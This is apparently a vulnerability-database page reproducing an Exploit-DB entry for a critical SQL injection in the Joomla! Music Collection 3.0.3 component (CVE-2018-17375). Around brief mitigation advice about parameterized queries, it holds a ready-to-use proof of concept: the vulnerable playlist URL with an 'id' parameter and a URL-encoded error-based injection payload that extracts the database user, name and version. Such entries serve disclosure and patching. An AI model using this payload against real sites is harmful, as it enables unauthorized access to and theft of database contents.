header-logo
Suggest Exploit
vendor:
Music Collection
by:
Ihsan Sencan
9.8
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: Music Collection
Affected Version From: 3.0.3
Affected Version To: 3.0.3
Patch Exists: YES
Related CWE: CVE-2018-17375
CPE: a:joomlathat:music_collection:3.0.3
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2018

Joomla! Component Music Collection 3.0.3 – SQL Injection

Joomla! Component Music Collection 3.0.3 is vulnerable to a SQL injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This request contains malicious SQL statements that are executed in the backend database. This can allow an attacker to gain unauthorized access to sensitive data stored in the database.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries. Additionally, developers should use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# # # # #
# Exploit Title: Joomla! Component Music Collection 3.0.3 - SQL Injection
# Dork: N/A
# Date: 2018-09-24
# Vendor Homepage: http://joomlathat.com/
# Software Link: https://extensions.joomla.org/extensions/extension/multimedia/multimedia-players/music-collection/
# Version: 3.0.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-17375
# # # # #
# Exploit Author: Ihsan Sencan
# # # # #
# POC: 
# 
# 1)
# http://localhost/[PATH]/index.php/music-collection/playlist-0-on-the-go?task=edit_playlist&id=[SQL]
# 
# 0%20%4f%52%20%28%53%45%4c%45%43%54%20%31%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29
#  
# # # #

Navigation

Suggest Exploit

Services By CQR